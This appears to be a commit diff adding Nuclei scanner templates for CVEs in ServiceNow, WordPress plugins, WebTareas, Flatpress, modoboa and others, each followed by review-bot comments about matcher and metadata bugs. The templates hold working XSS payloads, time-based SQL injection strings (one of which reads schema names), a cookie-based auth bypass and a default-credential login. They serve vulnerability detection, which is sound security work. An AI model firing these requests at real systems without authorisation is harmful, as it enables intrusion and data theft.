matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
condition: and
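Review bot: the body matcher looks for the payload in its percent-encoded form, `%3Cscript%3Ealert(document.domain)%3C/script%3E`, which is text a browser would not execute; as written, the template confirms that the encoded query string is echoed next to "Invalid consumer key", not that script markup reaches the page. Either match the decoded `<script>` form, if that is what the application returns, or describe the finding as reflection. The path also sends the payload with an empty parameter name (`?=`), which deserves a comment explaining why.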

View File

@ -0,0 +1,33 @@
id: CVE-2022-34094
info:
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
reference:
- https://github.com/edmarmoretti/i3geo/issues/5
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-34094
cwe-id: CWE-79
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
http:
- method: GET
path:
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
condition: and
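Review bot: the second reference points to `https://nvd.nist.gov/vuln/detail/CVE-2022-34093`, but this template is CVE-2022-34094; the link should go to the NVD entry for 34094. The body matcher checks for the percent-encoded payload rather than decoded markup, so it demonstrates that the query string is echoed, not that script reaches the page.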

View File

@ -0,0 +1,68 @@
id: CVE-2022-39048
info:
name: ServiceNow - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892
- https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39048
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-39048
cwe-id: CWE-79
metadata:
max-request: 3
verified: true
shodan-query: http.title:"ServiceNow"
tags: cve,cve2022,xss,servicenow,authenticated
http:
- raw:
- |
GET /navpage.do HTTP/1.1
Host: {{Hostname}}
- |
POST /login.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do
- |
GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'
- 'assessment_list.do'
condition: and
- type: word
part: header_3
words:
- 'text/html'
- type: status
part: header_3
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'
internal: true
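Review bot: the `status` matcher carries `part: header_3`, which looks copied from the header word matcher above it; a status check compares the status code, so the `part` key does not say which of the three responses is meant. If the intent is the third response, a `dsl` matcher with `status_code_3 == 200` states that explicitly. The `csrf` extractor uses `part: body` without an index, so it is worth a comment that it is expected to fire on the `/navpage.do` response.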

View File

@ -0,0 +1,40 @@
id: CVE-2022-40032
info:
name: Simple Task Managing System v1.0 - SQL Injection
author: r3Y3r53
severity: critical
description: |
SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.
reference:
- https://www.exploit-db.com/exploits/51273
- https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-40032
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40032
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
tags: cve,cve2022,simple-task,stms,sqli
http:
- raw:
- |
@timeout: 15s
POST /task/loginValidation.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 302'
- 'content_length == 0'
- 'contains(content_type, "text/html")'
condition: and
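Review bot: the delay in this request is not constant: `SLEEP(7-(IF(ORD(MID(...,12,1))>48,0,1)))` sleeps 7 seconds only when the twelfth character of the first schema name has a code above 48, and 6 seconds otherwise, so `duration>=7` depends on the target's database contents and can miss a vulnerable host. The expression also reads from `INFORMATION_SCHEMA.SCHEMATA`, which detection does not need. A fixed `SLEEP(7)`, as the other time-based templates in this commit use, would make the result deterministic. The description is generic SQL injection text and never names the affected endpoint; the request shows it is the `login` parameter of `/task/loginValidation.php`.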

View File

@ -0,0 +1,54 @@
id: CVE-2022-40047
info:
name: Flatpress < v1.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-40047
- https://github.com/flatpressblog/flatpress/issues/153
metadata:
max-request: 2
verified: true
shodan-query: http.html:"flatpress"
tags: cve,cve2022,flatpress,authenticated,xss
variables:
randstring: "{{to_lower(rand_base(16))}}"
http:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="user"
{{username}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="pass"
{{password}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="submit"
Login
------WebKitFormBoundary{{randstring}}--
- |
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "flatpress")'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onfocus=\"alert(document.domain)")'
condition: and
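Review bot: this template has no `classification` block, so it carries no `cve-id`, `cwe-id` or CVSS data; add one. The `name` says "Flatpress < v1.2.1" while the description says v1.2.1 itself contains the flaw; one of the two is wrong and should be corrected against the references. The description places the issue at `/flatpress/admin.php`, but the raw requests go to `/login.php` and `/admin.php` at the web root, so an install under a subdirectory would not be reached.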

View File

@ -0,0 +1,58 @@
id: CVE-2022-4049
info:
name: WP User <= 7.0 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
- https://wordpress.org/plugins/wp-user/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4049
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4049
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth
http:
- raw:
- |
GET {{path}} HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)
attack: clusterbomb
payloads:
path:
- "/index.php/user/"
- "/user"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header_2, "text/html")
- contains(body_2, 'Invalid Access')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
internal: true
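Review bot: the matcher mixes indexed and unindexed variables: `duration>=6` and `status_code == 200` have no suffix while `header_2` and `body_2` do; use `duration_2` and `status_code_2` so all four conditions refer to the injected POST. `verified: "true"` is a quoted string where the other templates use the boolean `true`, `matchers-condition: and` is redundant with a single matcher, and `metadata` has no `max-request`. `attack: clusterbomb` is declared with only one payload list (`path`); a comment on why that mode was chosen would help.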

View File

@ -0,0 +1,42 @@
id: CVE-2022-4059
info:
name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
remediation: Fixed in version 2.0
reference:
- https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d
- https://nvd.nist.gov/vuln/detail/CVE-2022-4059
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4059
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/cryptocurrency-widgets-pack/"
tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli
http:
- raw:
- |
@timeout: 20s
GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration_1>=7'
- 'len(body_1) == 0'
- 'status_code_1 == 302'
- 'contains(body_2, "Cryptocurrency Widgets Pack")'
condition: and
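Review bot: `max-request: 1` does not match the two requests in the `raw` block (the `admin-ajax.php` call and the `readme.txt` fetch); set it to 2. The tags have no plugin-specific entry, such as the `cryptocurrency-widgets-pack` slug already used in `publicwww-query`, so the template cannot be selected by plugin name.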

View File

@ -0,0 +1,36 @@
id: CVE-2022-4305
info:
name: Login as User or Customer < 3.3 - Privilege Escalation
author: r3Y3r53
severity: critical
description: |
The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
remediation: Fixed in version 3.3
reference:
- https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
- https://nvd.nist.gov/vuln/detail/CVE-2022-4305
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4305
cwe-id: CWE-269
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/login-as-customer-or-user"
tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass
http:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
Host: {{Hostname}}
Cookie: loginas_old_user_id=1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html") && contains(content_type, "Dashboard")'
condition: and
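Review bot: the second DSL expression will not be true for any real response: `contains(content_type, "Dashboard")` looks for page text inside the Content-Type header, so with `condition: and` the template never matches. The second operand was presumably meant to be `contains(body, "Dashboard")`. Even with that fix, a `200` page containing "Dashboard" is weak evidence of an admin session; matching on something only an authenticated admin view returns would cut false positives.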

View File

@ -0,0 +1,61 @@
id: CVE-2022-44290
info:
name: WebTareas 2.4p5 - SQL Injection
author: theamanrawat
severity: critical
description: |
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
reference:
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2022-44290
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-44290
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
tags: cve,cve2022,sqli,webtareas,authenticated
http:
- raw:
- |
POST /general/login.php?session=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
- |
@timeout: 20s
GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "text/html")
- contains(body, 'Delete the following?')
condition: and

View File

@ -0,0 +1,61 @@
id: CVE-2022-44291
info:
name: WebTareas 2.4p5 - SQL Injection
author: theamanrawat
severity: critical
description: |
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
reference:
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2022-44291
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-44291
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2022,sqli,webtareas,authenticated
http:
- raw:
- |
POST /general/login.php?session=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
- |
@timeout: 20s
GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'len(body_2) == 0'
- 'status_code_2 == 302'
- 'contains(header_2, "text/html")'
- 'contains(body_1, "webTareasSID")'
condition: and

View File

@ -0,0 +1,166 @@
id: CVE-2022-44957
info:
name: WebTareas 2.4p5 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference:
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/11
- https://nvd.nist.gov/vuln/detail/CVE-2022-44957
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44957
cwe-id: CWE-79
metadata:
max-request: 3
verified: true
tags: cve,cve2022,xss,webtareas,authenticated
http:
- raw:
- |
POST /general/login.php?session=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
- |
GET /clients/editclient.php? HTTP/1.1
Host: {{Hostname}}
- |
POST /clients/editclient.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="csrfToken"
{{csrf}}
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="action"
add
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="cown"
1
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="cn"
{{randstr}}<details/open/ontoggle=alert(document.domain)>
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="add"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="zip"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="ct"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="cou"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="wp"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="fa"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="url"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="email"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="curr"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="wc"
1
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="pym"
1
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="pyt"
7
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="c"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="ssc"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="attnam1"
-----------------------------34025600472463336623659912061
Content-Disposition: form-data; name="atttmp1"
-----------------------------34025600472463336623659912061--
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '<details/open/ontoggle=alert(document.domain)>'
- 'clients/listclients.php?'
condition: and
- type: word
part: header_3
words:
- text/html
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrfToken" value="([0-9a-zA-Z]+)"'
internal: true
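
Review bot: The third request stores a client record whose cn field carries the payload, and nothing in the template removes it afterwards, yet the tags line does not mark the template as intrusive. Add an intrusive tag so operators can exclude it from scans of production systems. The matchers also accept any response code; a status check on the third response would tighten the result.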

View File

@ -0,0 +1,51 @@
id: CVE-2022-45365
info:
name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting
author: theamanrawat
severity: medium
description: |
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability
- https://wordpress.org/plugins/stock-ticker/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45365
remediation: Fixed in version 3.23.3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-45365
cwe-id: CWE-79
metadata:
verified: "true"
publicwww-query: "/wp-content/plugins/stock-ticker/"
max-request: 1
tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Stock Ticker Fatal"
- "<IMG SRC=X ONERROR="
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2022-47075
info:
name: Smart Office Web 20.28 - Information Disclosure
author: r3Y3r53
severity: high
description: |
An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.
reference:
- https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47075
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-47075
metadata:
verified: true
tags: cve,cve2022,smart-office,info,exposure
http:
- method: GET
path:
- "{{BaseURL}}/ExportReportingManager.aspx"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/CSV")'
- 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")'
condition: and
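
Review bot: The description names two endpoints, ExportEmployeeDetails.aspx and ExportReportingManager.aspx, but path requests only the second. Either add the first path with stop-at-first-match or narrow the description. The content_type comparison against "application/CSV" is case-sensitive, so wrapping it in tolower() would be safer. classification has no cwe-id and metadata has no max-request.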

View File

@ -0,0 +1,34 @@
id: CVE-2023-0334
info:
name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin
reference:
- https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931
- https://nvd.nist.gov/vuln/detail/CVE-2023-0334
remediation: Fixed in version 3.6.3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/shortpixel-adaptive-images/"
tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images
http:
- method: GET
path:
- "{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")'
condition: and
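
Review bot: metadata declares max-request: 2 while path holds a single URL, so the count should be 1. classification also lacks the cve-id entry that the other files in this commit carry.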

View File

@ -0,0 +1,40 @@
id: CVE-2023-0600
info:
name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
author: r3Y3r53
severity: high
description: |
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
remediation: Fixed in version 6.9
reference:
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0600
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
public-www: "/wp-content/plugins/wp-stats-manager/"
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli
variables:
str: '{{rand_int(100000, 999999)}}'
http:
- raw:
- |
@timeout: 30s
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "sleep(10)")'
condition: and
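
Review bot: The matcher 'contains(body, "sleep(10)")' does not agree with the request, which injects sleep(6), so with condition: and the template cannot match unless the response happens to contain the literal text sleep(10). Make the body check consistent with the payload or replace it with a marker that identifies the plugin. The metadata key public-www should be publicwww-query, as in the other WordPress templates of this commit.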

View File

@ -0,0 +1,37 @@
id: CVE-2023-0602
info:
name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
reference:
- https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
- https://nvd.nist.gov/vuln/detail/CVE-2023-0602
- https://wordpress.org/plugins/twittee-text-tweet/
metadata:
verified: true
max-request: 2
tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")'
condition: and
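
Review bot: The second request targets page=vxcf_leads with form_id=cf_5, which does not correspond to the plugin named in the template, and it is a GET although the description says the reflected values are POST values. Please confirm the request against the WPScan reference; as written the match depends on the word "twittee" appearing in an unrelated admin page. The info block also has no classification section.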

View File

@ -0,0 +1,66 @@
id: CVE-2023-0777
info:
name: modoboa 2.0.4 - Admin TakeOver
author: r3Y3r53
severity: critical
description: |
Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
remediation: update to version 2.0.4
reference:
- https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/
- http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0777
cwe-id: CWE-305
cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: html:"Modoboa"
fofa-query: body="Modoboa"
tags: modoboa,default-login
http:
- raw:
- |
GET /accounts/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /accounts/login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F
- |
GET /dashboard/ HTTP/1.1
Host: {{Hostname}}
payloads:
username:
- admin
password:
- password
attack: pitchfork
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")'
condition: and
extractors:
- type: regex
part: header
name: csrftoken
internal: true
group: 1
regex:
- csrftoken=([A-Za-z0-9]+)
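
Review bot: The payloads section tries the fixed pair admin / password and the matcher looks for "Hello admin", so what this template verifies is a default credential rather than the authentication bypass in the description; the tags line says the same (modoboa,default-login, with no cve or cve2023 tag). Either move it to the default-logins set or document how the login relates to CVE-2023-0777. The name reads "modoboa 2.0.4" while the description says "prior to 2.0.4", and metadata has no max-request.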

View File

@ -0,0 +1,63 @@
id: CVE-2023-0900
info:
name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
author: r3Y3r53
severity: high
description: |
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
reference:
- https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
- https://github.com/WPPlugins/ap-pricing-tables-lite
- https://nvd.nist.gov/vuln/detail/CVE-2023-0900
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-0900
cwe-id: CWE-89
metadata:
max-request: 3
verified: true
publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
